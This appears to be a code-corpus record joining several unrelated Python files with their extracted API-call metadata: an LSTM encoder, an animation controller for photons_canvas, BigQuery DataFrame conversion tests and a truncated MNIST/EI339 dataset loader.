"cornflow_client.ApplicationCore.__subclasses__",
"datetime.timedelta",
"os.path.splitext",
"airflow.models.Variable.delete",
"airflow.models.Variable.set",
"os.listdir"
] |
[((2702, 2793), 'airflow.DAG', 'DAG', (['"""update_all_schemas"""'], {'default_args': 'default_args', 'catchup': '(False)', 'tags': "['internal']"}), "('update_all_schemas', default_args=default_args, catchup=False, tags=[\n 'internal'])\n", (2705, 2793), False, 'from airflow import DAG\n'), ((2813, 2924), 'airflow.operators.python.PythonOperator', 'PythonOperator', ([], {'task_id': '"""update_all_schemas"""', 'provide_context': '(True)', 'python_callable': 'update_schemas', 'dag': 'dag'}), "(task_id='update_all_schemas', provide_context=True,\n python_callable=update_schemas, dag=dag)\n", (2827, 2924), False, 'from airflow.operators.python import PythonOperator\n'), ((472, 492), 'datetime.datetime', 'datetime', (['(2020)', '(2)', '(1)'], {}), '(2020, 2, 1)\n', (480, 492), False, 'from datetime import datetime, timedelta\n'), ((611, 631), 'datetime.timedelta', 'timedelta', ([], {'minutes': '(1)'}), '(minutes=1)\n', (620, 631), False, 'from datetime import datetime, timedelta\n'), ((874, 906), 'cornflow_client.ApplicationCore.__subclasses__', 'ApplicationCore.__subclasses__', ([], {}), '()\n', (904, 906), False, 'from cornflow_client import ApplicationCore\n'), ((1037, 1062), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (1052, 1062), False, 'import os\n'), ((1128, 1144), 'os.listdir', 'os.listdir', (['_dir'], {}), '(_dir)\n', (1138, 1144), False, 'import os\n'), ((1597, 1623), 'importlib.import_module', 'il.import_module', (['filename'], {}), '(filename)\n', (1613, 1623), True, 'import importlib as il\n'), ((999, 1024), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (1014, 1024), False, 'import os\n'), ((1308, 1336), 'os.path.splitext', 'os.path.splitext', (['dag_module'], {}), '(dag_module)\n', (1324, 1336), False, 'import os\n'), ((2266, 2321), 'airflow.models.Variable.set', 'Variable.set', ([], {'key': 'key', 'value': 'value', 'serialize_json': '(True)'}), '(key=key, value=value, serialize_json=True)\n', 
(2278, 2321), False, 'from airflow.models import Variable\n'), ((2391, 2407), 'airflow.utils.db.create_session', 'create_session', ([], {}), '()\n', (2405, 2407), False, 'from airflow.utils.db import create_session\n'), ((2663, 2693), 'airflow.models.Variable.delete', 'Variable.delete', (['_var', 'session'], {}), '(_var, session)\n', (2678, 2693), False, 'from airflow.models import Variable\n')]
|
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from vae_train.vae_utils import *
class Encoder(nn.Module):
    """LSTM sequence encoder, optionally conditioned on a class vector.

    When ``n_class`` is given, the per-sequence label tensor ``y`` is tiled
    across the time dimension and concatenated to every input embedding,
    widening the LSTM input by ``n_class`` features.

    Fixes:
      * the two nearly identical ``nn.LSTM`` constructions are collapsed
        into one (only the input width differed);
      * calling ``forward`` with ``sent_len=None`` used to index the output
        with ``None``, yielding a malformed ``(batch, 1, seq, hidden)``
        tensor — it now falls back to the final timestep.
    """

    def __init__(self, embedding_size=128, n_highway_layers=0, encoder_hidden_size=128,
                 n_class=None, encoder_layers=1, bidirectional=False):
        super(Encoder, self).__init__()
        self.n_class = n_class
        self.encoder_hidden_size = encoder_hidden_size
        self.encoder_layers = encoder_layers
        # Number of directions (2 when bidirectional), kept for downstream
        # size arithmetic.
        self.bidirectional = 2 if bidirectional else 1
        # Class conditioning simply widens the input feature dimension.
        input_size = embedding_size if n_class is None else embedding_size + n_class
        self.lstm = nn.LSTM(input_size=input_size, hidden_size=encoder_hidden_size,
                            num_layers=encoder_layers, batch_first=True,
                            bidirectional=bidirectional)

    def forward(self, x, y=None, sent_len=None):
        """Encode ``x`` (batch, seq, embedding) and return one hidden vector
        per sequence.

        ``sent_len`` (per-sequence index tensor) selects the LSTM output at
        that position; if omitted, the last timestep is used.
        """
        batch_size, seq_len = x.shape[0], x.shape[1]
        if self.n_class is not None and y is not None:
            # Repeat the class vector at every timestep and append it to the
            # embeddings along the feature axis.
            y = torch.cat([y] * seq_len, 1).view(batch_size,
                                                   seq_len, self.n_class)
            x = torch.cat([x, y], dim=2)
        output, (h_n, c_n) = self.lstm(x)
        if sent_len is None:
            # Fallback for unspecified lengths: final timestep output.
            return output[:, -1]
        # NOTE(review): this reads output[sent_len], i.e. the step *after*
        # the last real token (presumably an EOS position) — confirm it
        # should not be sent_len - 1.
        return output[torch.arange(batch_size), sent_len]
|
[
"torch.nn.LSTM",
"torch.cat",
"torch.arange"
] |
[((569, 714), 'torch.nn.LSTM', 'nn.LSTM', ([], {'input_size': 'embedding_size', 'hidden_size': 'encoder_hidden_size', 'num_layers': 'encoder_layers', 'batch_first': '(True)', 'bidirectional': 'bidirectional'}), '(input_size=embedding_size, hidden_size=encoder_hidden_size,\n num_layers=encoder_layers, batch_first=True, bidirectional=bidirectional)\n', (576, 714), True, 'import torch.nn as nn\n'), ((781, 941), 'torch.nn.LSTM', 'nn.LSTM', ([], {'input_size': '(embedding_size + n_class)', 'hidden_size': 'encoder_hidden_size', 'num_layers': 'encoder_layers', 'batch_first': '(True)', 'bidirectional': 'bidirectional'}), '(input_size=embedding_size + n_class, hidden_size=\n encoder_hidden_size, num_layers=encoder_layers, batch_first=True,\n bidirectional=bidirectional)\n', (788, 941), True, 'import torch.nn as nn\n'), ((1278, 1302), 'torch.cat', 'torch.cat', (['[x, y]'], {'dim': '(2)'}), '([x, y], dim=2)\n', (1287, 1302), False, 'import torch\n'), ((1370, 1399), 'torch.arange', 'torch.arange', (['output.shape[0]'], {}), '(output.shape[0])\n', (1382, 1399), False, 'import torch\n'), ((1149, 1176), 'torch.cat', 'torch.cat', (['([y] * seq_len)', '(1)'], {}), '([y] * seq_len, 1)\n', (1158, 1176), False, 'import torch\n')]
|
from photons_canvas.animations import register, AnimationRunner
from photons_canvas.animations.action import expand
from photons_app.errors import PhotonsAppError
from photons_app import helpers as hp
from delfick_project.option_merge import MergedOptions
from delfick_project.norms import sb
from textwrap import dedent
import logging
import asyncio
import io
log = logging.getLogger("interactor.commander.animations")
def errors(e):
if isinstance(e, KeyboardInterrupt):
return
if not isinstance(e, PhotonsAppError):
log.exception(e)
else:
log.error(e)
class Animation:
def __init__(self, final_future, identity, runner, pauser):
self.runner = runner
self.pauser = pauser
self.paused = False
self.identity = identity
self.final_future = final_future
@property
def info(self):
return self.runner.info
async def pause(self):
if not self.paused:
await self.pauser.acquire()
self.paused = True
async def resume(self):
self.paused = False
self.pauser.release()
async def stop(self):
self.final_future.cancel()
def start(self, tasks, *callbacks):
async def animation():
async with self.runner:
await self.runner.run()
self.task = tasks.add(animation())
for cb in callbacks:
self.task.add_done_callback(cb)
return self
class Animations:
available = register.available_animations()
def __init__(self, final_future, tasks, sender, animation_options):
self.tasks = tasks
self.sender = sender
self.final_future = final_future
self.animation_options = animation_options
self.animations = {}
def info(self, identity=None, expand=False, **extra):
if identity is not None:
if identity not in self.animations:
return
else:
return self.animations[identity].info
animations = {
identity: animation.info for identity, animation in sorted(self.animations.items())
}
if not expand:
animations = sorted(animations)
return {
"animations": animations,
"paused": sorted(
[animation.identity for animation in self.animations.values() if animation.paused]
),
**extra,
}
async def start(
self,
identity,
reference,
*,
run_options=sb.NotSpecified,
animations=sb.NotSpecified,
):
pauser = asyncio.Semaphore()
final_future = hp.ChildOfFuture(
self.final_future, name=f"Animations::start({identity})[final_future]"
)
if run_options is sb.NotSpecified:
run_options = {}
if animations is not sb.NotSpecified:
run_options = MergedOptions.using(run_options, {"animations": animations}).as_dict()
runner = AnimationRunner(
self.sender,
reference,
run_options,
final_future=final_future,
error_catcher=errors,
animation_options=self.animation_options,
)
runner.run_options.pauser = pauser
def remove(res):
if identity in self.animations:
del self.animations[identity]
self.animations[identity] = Animation(final_future, identity, runner, pauser).start(
self.tasks, remove
)
return self.info(started=identity)
async def pause(self, *identities):
return await self.action("pause", "pausing", identities)
async def resume(self, *identities):
return await self.action("resume", "resuming", identities)
async def stop(self, *identities):
return await self.action("stop", "stopping", identities)
async def help(self, animation_name=None):
out = io.StringIO()
def p(s=""):
print(s, file=out)
animation_kls = None
if animation_name in register.animations:
animation_kls = register.animations[animation_name].Animation
if animation_kls is None:
p("Available animations include")
for animation in register.available_animations():
p(f"* {animation}")
p()
p("To see options for a particular animation, run this again")
p("but with the `animation_name` option set to the name of the animation.")
p()
else:
p()
p("-" * 80)
p(f"{animation_name} animation")
p("-" * 80)
p()
expand(dedent(animation_kls.__doc__ or "").strip(), output=out)
out.flush()
out.seek(0)
return out.read()
async def action(self, method, verb, identities):
if not identities:
identities = list(self.animations)
changed = []
async with hp.TaskHolder(self.final_future, name=f"Animations::action({method})[ts]") as ts:
for identity in identities:
if identity in self.animations:
changed.append(identity)
ts.add(getattr(self.animations[identity], method)())
return self.info(**{verb: changed})
|
[
"textwrap.dedent",
"io.StringIO",
"asyncio.Semaphore",
"photons_canvas.animations.AnimationRunner",
"photons_canvas.animations.register.available_animations",
"photons_app.helpers.TaskHolder",
"photons_app.helpers.ChildOfFuture",
"delfick_project.option_merge.MergedOptions.using",
"logging.getLogger"
] |
[((370, 422), 'logging.getLogger', 'logging.getLogger', (['"""interactor.commander.animations"""'], {}), "('interactor.commander.animations')\n", (387, 422), False, 'import logging\n'), ((1504, 1535), 'photons_canvas.animations.register.available_animations', 'register.available_animations', ([], {}), '()\n', (1533, 1535), False, 'from photons_canvas.animations import register, AnimationRunner\n'), ((2631, 2650), 'asyncio.Semaphore', 'asyncio.Semaphore', ([], {}), '()\n', (2648, 2650), False, 'import asyncio\n'), ((2674, 2767), 'photons_app.helpers.ChildOfFuture', 'hp.ChildOfFuture', (['self.final_future'], {'name': 'f"""Animations::start({identity})[final_future]"""'}), "(self.final_future, name=\n f'Animations::start({identity})[final_future]')\n", (2690, 2767), True, 'from photons_app import helpers as hp\n'), ((3020, 3173), 'photons_canvas.animations.AnimationRunner', 'AnimationRunner', (['self.sender', 'reference', 'run_options'], {'final_future': 'final_future', 'error_catcher': 'errors', 'animation_options': 'self.animation_options'}), '(self.sender, reference, run_options, final_future=\n final_future, error_catcher=errors, animation_options=self.\n animation_options)\n', (3035, 3173), False, 'from photons_canvas.animations import register, AnimationRunner\n'), ((3968, 3981), 'io.StringIO', 'io.StringIO', ([], {}), '()\n', (3979, 3981), False, 'import io\n'), ((4299, 4330), 'photons_canvas.animations.register.available_animations', 'register.available_animations', ([], {}), '()\n', (4328, 4330), False, 'from photons_canvas.animations import register, AnimationRunner\n'), ((5016, 5090), 'photons_app.helpers.TaskHolder', 'hp.TaskHolder', (['self.final_future'], {'name': 'f"""Animations::action({method})[ts]"""'}), "(self.final_future, name=f'Animations::action({method})[ts]')\n", (5029, 5090), True, 'from photons_app import helpers as hp\n'), ((2931, 2991), 'delfick_project.option_merge.MergedOptions.using', 'MergedOptions.using', (['run_options', 
"{'animations': animations}"], {}), "(run_options, {'animations': animations})\n", (2950, 2991), False, 'from delfick_project.option_merge import MergedOptions\n'), ((4722, 4757), 'textwrap.dedent', 'dedent', (["(animation_kls.__doc__ or '')"], {}), "(animation_kls.__doc__ or '')\n", (4728, 4757), False, 'from textwrap import dedent\n')]
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import decimal
from unittest import mock
import pyarrow
import pytest
from google.cloud import bigquery
pandas = pytest.importorskip("pandas")
TEST_PATH = "/v1/project/test-proj/dataset/test-dset/table/test-tbl/data"
@pytest.fixture
def class_under_test():
from google.cloud.bigquery.table import RowIterator
return RowIterator
def test_to_dataframe_nullable_scalars(monkeypatch, class_under_test):
# See tests/system/test_arrow.py for the actual types we get from the API.
arrow_schema = pyarrow.schema(
[
pyarrow.field("bignumeric_col", pyarrow.decimal256(76, scale=38)),
pyarrow.field("bool_col", pyarrow.bool_()),
pyarrow.field("bytes_col", pyarrow.binary()),
pyarrow.field("date_col", pyarrow.date32()),
pyarrow.field("datetime_col", pyarrow.timestamp("us", tz=None)),
pyarrow.field("float64_col", pyarrow.float64()),
pyarrow.field("int64_col", pyarrow.int64()),
pyarrow.field("numeric_col", pyarrow.decimal128(38, scale=9)),
pyarrow.field("string_col", pyarrow.string()),
pyarrow.field("time_col", pyarrow.time64("us")),
pyarrow.field(
"timestamp_col", pyarrow.timestamp("us", tz=datetime.timezone.utc)
),
]
)
arrow_table = pyarrow.Table.from_pydict(
{
"bignumeric_col": [decimal.Decimal("123.456789101112131415")],
"bool_col": [True],
"bytes_col": [b"Hello,\x00World!"],
"date_col": [datetime.date(2021, 8, 9)],
"datetime_col": [datetime.datetime(2021, 8, 9, 13, 30, 44, 123456)],
"float64_col": [1.25],
"int64_col": [-7],
"numeric_col": [decimal.Decimal("-123.456789")],
"string_col": ["abcdefg"],
"time_col": [datetime.time(14, 21, 17, 123456)],
"timestamp_col": [
datetime.datetime(
2021, 8, 9, 13, 30, 44, 123456, tzinfo=datetime.timezone.utc
)
],
},
schema=arrow_schema,
)
nullable_schema = [
bigquery.SchemaField("bignumeric_col", "BIGNUMERIC"),
bigquery.SchemaField("bool_col", "BOOLEAN"),
bigquery.SchemaField("bytes_col", "BYTES"),
bigquery.SchemaField("date_col", "DATE"),
bigquery.SchemaField("datetime_col", "DATETIME"),
bigquery.SchemaField("float64_col", "FLOAT"),
bigquery.SchemaField("int64_col", "INT64"),
bigquery.SchemaField("numeric_col", "NUMERIC"),
bigquery.SchemaField("string_col", "STRING"),
bigquery.SchemaField("time_col", "TIME"),
bigquery.SchemaField("timestamp_col", "TIMESTAMP"),
]
mock_client = mock.create_autospec(bigquery.Client)
mock_client.project = "test-proj"
mock_api_request = mock.Mock()
mock_to_arrow = mock.Mock()
mock_to_arrow.return_value = arrow_table
rows = class_under_test(mock_client, mock_api_request, TEST_PATH, nullable_schema)
monkeypatch.setattr(rows, "to_arrow", mock_to_arrow)
df = rows.to_dataframe()
# Check for expected dtypes.
# Keep these in sync with tests/system/test_pandas.py
assert df.dtypes["bignumeric_col"].name == "object"
assert df.dtypes["bool_col"].name == "boolean"
assert df.dtypes["bytes_col"].name == "object"
assert df.dtypes["date_col"].name == "dbdate"
assert df.dtypes["datetime_col"].name == "datetime64[ns]"
assert df.dtypes["float64_col"].name == "float64"
assert df.dtypes["int64_col"].name == "Int64"
assert df.dtypes["numeric_col"].name == "object"
assert df.dtypes["string_col"].name == "object"
assert df.dtypes["time_col"].name == "dbtime"
assert df.dtypes["timestamp_col"].name == "datetime64[ns, UTC]"
# Check for expected values.
assert df["bignumeric_col"][0] == decimal.Decimal("123.456789101112131415")
assert df["bool_col"][0] # True
assert df["bytes_col"][0] == b"Hello,\x00World!"
# object is used by default, but we can use "datetime64[ns]" automatically
# when data is within the supported range.
# https://github.com/googleapis/python-bigquery/issues/861
assert df["date_col"][0] == datetime.date(2021, 8, 9)
assert df["datetime_col"][0] == pandas.to_datetime("2021-08-09 13:30:44.123456")
assert df["float64_col"][0] == 1.25
assert df["int64_col"][0] == -7
assert df["numeric_col"][0] == decimal.Decimal("-123.456789")
assert df["string_col"][0] == "abcdefg"
# Pandas timedelta64 might be a better choice for pandas time columns. Then
# they can more easily be combined with date columns to form datetimes.
# https://github.com/googleapis/python-bigquery/issues/862
assert df["time_col"][0] == datetime.time(14, 21, 17, 123456)
assert df["timestamp_col"][0] == pandas.to_datetime("2021-08-09 13:30:44.123456Z")
def test_to_dataframe_nullable_scalars_with_custom_dtypes(
monkeypatch, class_under_test
):
"""Passing in explicit dtypes is merged with default behavior."""
arrow_schema = pyarrow.schema(
[
pyarrow.field("int64_col", pyarrow.int64()),
pyarrow.field("other_int_col", pyarrow.int64()),
]
)
arrow_table = pyarrow.Table.from_pydict(
{"int64_col": [1000], "other_int_col": [-7]},
schema=arrow_schema,
)
nullable_schema = [
bigquery.SchemaField("int64_col", "INT64"),
bigquery.SchemaField("other_int_col", "INT64"),
]
mock_client = mock.create_autospec(bigquery.Client)
mock_client.project = "test-proj"
mock_api_request = mock.Mock()
mock_to_arrow = mock.Mock()
mock_to_arrow.return_value = arrow_table
rows = class_under_test(mock_client, mock_api_request, TEST_PATH, nullable_schema)
monkeypatch.setattr(rows, "to_arrow", mock_to_arrow)
df = rows.to_dataframe(dtypes={"other_int_col": "int8"})
assert df.dtypes["int64_col"].name == "Int64"
assert df["int64_col"][0] == 1000
assert df.dtypes["other_int_col"].name == "int8"
assert df["other_int_col"][0] == -7
def test_to_dataframe_arrays(monkeypatch, class_under_test):
arrow_schema = pyarrow.schema(
[pyarrow.field("int64_repeated", pyarrow.list_(pyarrow.int64()))]
)
arrow_table = pyarrow.Table.from_pydict(
{"int64_repeated": [[-1, 0, 2]]},
schema=arrow_schema,
)
nullable_schema = [
bigquery.SchemaField("int64_repeated", "INT64", mode="REPEATED"),
]
mock_client = mock.create_autospec(bigquery.Client)
mock_client.project = "test-proj"
mock_api_request = mock.Mock()
mock_to_arrow = mock.Mock()
mock_to_arrow.return_value = arrow_table
rows = class_under_test(mock_client, mock_api_request, TEST_PATH, nullable_schema)
monkeypatch.setattr(rows, "to_arrow", mock_to_arrow)
df = rows.to_dataframe()
assert df.dtypes["int64_repeated"].name == "object"
assert tuple(df["int64_repeated"][0]) == (-1, 0, 2)
|
[
"unittest.mock.create_autospec",
"google.cloud.bigquery.SchemaField",
"pyarrow.decimal256",
"datetime.time",
"pyarrow.time64",
"pyarrow.binary",
"pyarrow.bool_",
"pyarrow.int64",
"datetime.date",
"datetime.datetime",
"pyarrow.timestamp",
"pyarrow.float64",
"pytest.importorskip",
"decimal.Decimal",
"pyarrow.Table.from_pydict",
"pyarrow.decimal128",
"unittest.mock.Mock",
"pyarrow.date32",
"pyarrow.string"
] |
[((707, 736), 'pytest.importorskip', 'pytest.importorskip', (['"""pandas"""'], {}), "('pandas')\n", (726, 736), False, 'import pytest\n'), ((3360, 3397), 'unittest.mock.create_autospec', 'mock.create_autospec', (['bigquery.Client'], {}), '(bigquery.Client)\n', (3380, 3397), False, 'from unittest import mock\n'), ((3459, 3470), 'unittest.mock.Mock', 'mock.Mock', ([], {}), '()\n', (3468, 3470), False, 'from unittest import mock\n'), ((3491, 3502), 'unittest.mock.Mock', 'mock.Mock', ([], {}), '()\n', (3500, 3502), False, 'from unittest import mock\n'), ((5873, 5969), 'pyarrow.Table.from_pydict', 'pyarrow.Table.from_pydict', (["{'int64_col': [1000], 'other_int_col': [-7]}"], {'schema': 'arrow_schema'}), "({'int64_col': [1000], 'other_int_col': [-7]},\n schema=arrow_schema)\n", (5898, 5969), False, 'import pyarrow\n'), ((6146, 6183), 'unittest.mock.create_autospec', 'mock.create_autospec', (['bigquery.Client'], {}), '(bigquery.Client)\n', (6166, 6183), False, 'from unittest import mock\n'), ((6245, 6256), 'unittest.mock.Mock', 'mock.Mock', ([], {}), '()\n', (6254, 6256), False, 'from unittest import mock\n'), ((6277, 6288), 'unittest.mock.Mock', 'mock.Mock', ([], {}), '()\n', (6286, 6288), False, 'from unittest import mock\n'), ((6918, 7003), 'pyarrow.Table.from_pydict', 'pyarrow.Table.from_pydict', (["{'int64_repeated': [[-1, 0, 2]]}"], {'schema': 'arrow_schema'}), "({'int64_repeated': [[-1, 0, 2]]}, schema=arrow_schema\n )\n", (6943, 7003), False, 'import pyarrow\n'), ((7145, 7182), 'unittest.mock.create_autospec', 'mock.create_autospec', (['bigquery.Client'], {}), '(bigquery.Client)\n', (7165, 7182), False, 'from unittest import mock\n'), ((7244, 7255), 'unittest.mock.Mock', 'mock.Mock', ([], {}), '()\n', (7253, 7255), False, 'from unittest import mock\n'), ((7276, 7287), 'unittest.mock.Mock', 'mock.Mock', ([], {}), '()\n', (7285, 7287), False, 'from unittest import mock\n'), ((2743, 2795), 'google.cloud.bigquery.SchemaField', 'bigquery.SchemaField', 
(['"""bignumeric_col"""', '"""BIGNUMERIC"""'], {}), "('bignumeric_col', 'BIGNUMERIC')\n", (2763, 2795), False, 'from google.cloud import bigquery\n'), ((2805, 2848), 'google.cloud.bigquery.SchemaField', 'bigquery.SchemaField', (['"""bool_col"""', '"""BOOLEAN"""'], {}), "('bool_col', 'BOOLEAN')\n", (2825, 2848), False, 'from google.cloud import bigquery\n'), ((2858, 2900), 'google.cloud.bigquery.SchemaField', 'bigquery.SchemaField', (['"""bytes_col"""', '"""BYTES"""'], {}), "('bytes_col', 'BYTES')\n", (2878, 2900), False, 'from google.cloud import bigquery\n'), ((2910, 2950), 'google.cloud.bigquery.SchemaField', 'bigquery.SchemaField', (['"""date_col"""', '"""DATE"""'], {}), "('date_col', 'DATE')\n", (2930, 2950), False, 'from google.cloud import bigquery\n'), ((2960, 3008), 'google.cloud.bigquery.SchemaField', 'bigquery.SchemaField', (['"""datetime_col"""', '"""DATETIME"""'], {}), "('datetime_col', 'DATETIME')\n", (2980, 3008), False, 'from google.cloud import bigquery\n'), ((3018, 3062), 'google.cloud.bigquery.SchemaField', 'bigquery.SchemaField', (['"""float64_col"""', '"""FLOAT"""'], {}), "('float64_col', 'FLOAT')\n", (3038, 3062), False, 'from google.cloud import bigquery\n'), ((3072, 3114), 'google.cloud.bigquery.SchemaField', 'bigquery.SchemaField', (['"""int64_col"""', '"""INT64"""'], {}), "('int64_col', 'INT64')\n", (3092, 3114), False, 'from google.cloud import bigquery\n'), ((3124, 3170), 'google.cloud.bigquery.SchemaField', 'bigquery.SchemaField', (['"""numeric_col"""', '"""NUMERIC"""'], {}), "('numeric_col', 'NUMERIC')\n", (3144, 3170), False, 'from google.cloud import bigquery\n'), ((3180, 3224), 'google.cloud.bigquery.SchemaField', 'bigquery.SchemaField', (['"""string_col"""', '"""STRING"""'], {}), "('string_col', 'STRING')\n", (3200, 3224), False, 'from google.cloud import bigquery\n'), ((3234, 3274), 'google.cloud.bigquery.SchemaField', 'bigquery.SchemaField', (['"""time_col"""', '"""TIME"""'], {}), "('time_col', 'TIME')\n", (3254, 3274), False, 
'from google.cloud import bigquery\n'), ((3284, 3334), 'google.cloud.bigquery.SchemaField', 'bigquery.SchemaField', (['"""timestamp_col"""', '"""TIMESTAMP"""'], {}), "('timestamp_col', 'TIMESTAMP')\n", (3304, 3334), False, 'from google.cloud import bigquery\n'), ((4482, 4523), 'decimal.Decimal', 'decimal.Decimal', (['"""123.456789101112131415"""'], {}), "('123.456789101112131415')\n", (4497, 4523), False, 'import decimal\n'), ((4836, 4861), 'datetime.date', 'datetime.date', (['(2021)', '(8)', '(9)'], {}), '(2021, 8, 9)\n', (4849, 4861), False, 'import datetime\n'), ((5059, 5089), 'decimal.Decimal', 'decimal.Decimal', (['"""-123.456789"""'], {}), "('-123.456789')\n", (5074, 5089), False, 'import decimal\n'), ((5386, 5419), 'datetime.time', 'datetime.time', (['(14)', '(21)', '(17)', '(123456)'], {}), '(14, 21, 17, 123456)\n', (5399, 5419), False, 'import datetime\n'), ((6022, 6064), 'google.cloud.bigquery.SchemaField', 'bigquery.SchemaField', (['"""int64_col"""', '"""INT64"""'], {}), "('int64_col', 'INT64')\n", (6042, 6064), False, 'from google.cloud import bigquery\n'), ((6074, 6120), 'google.cloud.bigquery.SchemaField', 'bigquery.SchemaField', (['"""other_int_col"""', '"""INT64"""'], {}), "('other_int_col', 'INT64')\n", (6094, 6120), False, 'from google.cloud import bigquery\n'), ((7055, 7119), 'google.cloud.bigquery.SchemaField', 'bigquery.SchemaField', (['"""int64_repeated"""', '"""INT64"""'], {'mode': '"""REPEATED"""'}), "('int64_repeated', 'INT64', mode='REPEATED')\n", (7075, 7119), False, 'from google.cloud import bigquery\n'), ((1176, 1208), 'pyarrow.decimal256', 'pyarrow.decimal256', (['(76)'], {'scale': '(38)'}), '(76, scale=38)\n', (1194, 1208), False, 'import pyarrow\n'), ((1249, 1264), 'pyarrow.bool_', 'pyarrow.bool_', ([], {}), '()\n', (1262, 1264), False, 'import pyarrow\n'), ((1306, 1322), 'pyarrow.binary', 'pyarrow.binary', ([], {}), '()\n', (1320, 1322), False, 'import pyarrow\n'), ((1363, 1379), 'pyarrow.date32', 'pyarrow.date32', ([], {}), '()\n', 
(1377, 1379), False, 'import pyarrow\n'), ((1424, 1456), 'pyarrow.timestamp', 'pyarrow.timestamp', (['"""us"""'], {'tz': 'None'}), "('us', tz=None)\n", (1441, 1456), False, 'import pyarrow\n'), ((1500, 1517), 'pyarrow.float64', 'pyarrow.float64', ([], {}), '()\n', (1515, 1517), False, 'import pyarrow\n'), ((1559, 1574), 'pyarrow.int64', 'pyarrow.int64', ([], {}), '()\n', (1572, 1574), False, 'import pyarrow\n'), ((1618, 1649), 'pyarrow.decimal128', 'pyarrow.decimal128', (['(38)'], {'scale': '(9)'}), '(38, scale=9)\n', (1636, 1649), False, 'import pyarrow\n'), ((1692, 1708), 'pyarrow.string', 'pyarrow.string', ([], {}), '()\n', (1706, 1708), False, 'import pyarrow\n'), ((1749, 1769), 'pyarrow.time64', 'pyarrow.time64', (['"""us"""'], {}), "('us')\n", (1763, 1769), False, 'import pyarrow\n'), ((1832, 1881), 'pyarrow.timestamp', 'pyarrow.timestamp', (['"""us"""'], {'tz': 'datetime.timezone.utc'}), "('us', tz=datetime.timezone.utc)\n", (1849, 1881), False, 'import pyarrow\n'), ((1999, 2040), 'decimal.Decimal', 'decimal.Decimal', (['"""123.456789101112131415"""'], {}), "('123.456789101112131415')\n", (2014, 2040), False, 'import decimal\n'), ((2148, 2173), 'datetime.date', 'datetime.date', (['(2021)', '(8)', '(9)'], {}), '(2021, 8, 9)\n', (2161, 2173), False, 'import datetime\n'), ((2205, 2254), 'datetime.datetime', 'datetime.datetime', (['(2021)', '(8)', '(9)', '(13)', '(30)', '(44)', '(123456)'], {}), '(2021, 8, 9, 13, 30, 44, 123456)\n', (2222, 2254), False, 'import datetime\n'), ((2351, 2381), 'decimal.Decimal', 'decimal.Decimal', (['"""-123.456789"""'], {}), "('-123.456789')\n", (2366, 2381), False, 'import decimal\n'), ((2448, 2481), 'datetime.time', 'datetime.time', (['(14)', '(21)', '(17)', '(123456)'], {}), '(14, 21, 17, 123456)\n', (2461, 2481), False, 'import datetime\n'), ((2531, 2610), 'datetime.datetime', 'datetime.datetime', (['(2021)', '(8)', '(9)', '(13)', '(30)', '(44)', '(123456)'], {'tzinfo': 'datetime.timezone.utc'}), '(2021, 8, 9, 13, 30, 44, 
123456, tzinfo=datetime.timezone.utc)\n', (2548, 2610), False, 'import datetime\n'), ((5760, 5775), 'pyarrow.int64', 'pyarrow.int64', ([], {}), '()\n', (5773, 5775), False, 'import pyarrow\n'), ((5821, 5836), 'pyarrow.int64', 'pyarrow.int64', ([], {}), '()\n', (5834, 5836), False, 'import pyarrow\n'), ((6875, 6890), 'pyarrow.int64', 'pyarrow.int64', ([], {}), '()\n', (6888, 6890), False, 'import pyarrow\n')]
|
import os
import inspect
from tqdm import tqdm
import numpy as np
import typing
import cv2
import torchvision
import torch
from PIL import Image
from torch.utils.data import Dataset, DataLoader
# root (correct even if called)
CRT_ABS_PATH = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
# keys of dataset
KEYS = ["MNIST", "EI339", "combined"]
# relative to root/
PATH_TO_DATASET = {"MNIST": "MNIST/",
"EI339": "EI339-CN dataset sjtu/",
"MNIST+EI339": "MNIST+EI339/", }
# relative to root/PATH_TO_DATASET
DATASET_MAPPING_FN = {"MNIST": None,
"combined": None,
"EI339": {"train": {"data": "mapping/train_data.npy",
"label": "mapping/train_label.npy"},
"test": {"data": "mapping/test_data.npy",
"label": "mapping/test_label.npy"}, }, }
# relative to root/PATH_TO_DATASET
DATASET_SPLITS = {"MNIST": {"raw": "raw/",
"train": "processed/training.pt",
"test": "processed/test.pt"},
"EI339": {"raw": "",
"train": "processed/training.pt",
"test": "processed/test.pt"},
"MNIST+EI339": {"raw": None,
"train": "training.pt",
"test": "test.pt"}, }
"""
~ root (CRT_ABS_PATH)
+ --- PATH_TO_DATASET
+ --- DATASET_MAPPING_FN
+ --- DATASET_SPLITS
"""
def __ei339_generate_raw_mappings__() -> \
typing.Tuple[typing.Tuple[np.ndarray, np.ndarray],
typing.Tuple[np.ndarray, np.ndarray]]:
abs_train_data_fn = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["EI339"], DATASET_MAPPING_FN["EI339"]["train"]["data"])
abs_train_label_fn = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["EI339"], DATASET_MAPPING_FN["EI339"]["train"]["label"])
abs_test_data_fn = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["EI339"], DATASET_MAPPING_FN["EI339"]["test"]["data"])
abs_test_label_fn = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["EI339"], DATASET_MAPPING_FN["EI339"]["test"]["label"])
if os.path.exists(path=abs_train_data_fn) and os.path.exists(path=abs_train_label_fn) \
and os.path.exists(path=abs_test_data_fn) and os.path.exists(path=abs_test_label_fn):
# print("Mappings Loaded from File")
return (np.load(abs_train_data_fn), np.load(abs_train_label_fn)), \
(np.load(abs_test_data_fn), np.load(abs_test_label_fn))
__ensure_path_validation__(abs_train_data_fn)
__ensure_path_validation__(abs_train_label_fn)
__ensure_path_validation__(abs_test_data_fn)
__ensure_path_validation__(abs_test_label_fn)
train_data_map, train_label_map = [], []
test_data_map, test_label_map = [], []
for label_num in tqdm(range(1, 10 + 1)):
# print("Mapping Images of Label %d" % label_num)
abs_path_to_file_folder = os.path.join(
